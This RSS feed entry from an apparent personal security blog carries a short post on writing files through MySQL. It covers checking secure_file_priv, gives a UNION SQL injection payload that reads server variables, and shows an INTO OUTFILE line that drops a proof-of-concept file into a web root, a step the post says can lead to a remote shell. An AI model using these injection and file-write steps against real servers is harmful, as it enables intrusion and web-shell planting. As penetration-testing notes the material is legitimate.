https://slightlymore.co.uk/tags/remote-shell/Recent content in Remote-Shell on slightlymoreHugoen-GB<a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="license">CC BY 4.0</a> by Clinton MontagueSat, 03 Jan 2026 21:09:58 +0000https://slightlymore.co.uk/writing-files-with-mysql/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/writing-files-with-mysql/<h2 id="prerequisites">Prerequisites</h2> <p>This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.</p> <p><a href="https://dev.mysql.com/doc/refman/8.4/en/server-system-variables.html#sysvar_secure_file_priv" target="_blank" rel="noopener"><code>secure_file_priv</code> ↗️</a> can have the following values:</p> <ul> <li><code>null</code>: cannot write anywhere on system</li> <li><code>&quot;&quot;</code> (empty string): can write anywhere</li> <li><code>&quot;/path/to/dir&quot;</code>: can write only to specified path</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SHOW</span><span class="w"> </span><span class="n">VARIABLES</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;secure_file_priv&#39;</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><p>You can get this by querying the information_schema using a union injection</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">VARIABLE_NAME</span><span class="p">,</span><span class="n">VARIABLE_VALUE</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">GLOBAL_VARIABLES</span><span class="w"> </span></span></span></code></pre></div><h2 id="do-it">Do it</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">SELECT</span><span class="w"> </span><span class="s2">&#34;OOPS!&#34;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s2">&#34;/var/www/html/poc.txt&#34;</span><span class="w"> </span></span></span></code></pre></div><h2 id="references">References</h2> <ul> <li> <p><a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">Enumerating databases, tables, columns, and user privileges with SQL injection 🌿</a> </p>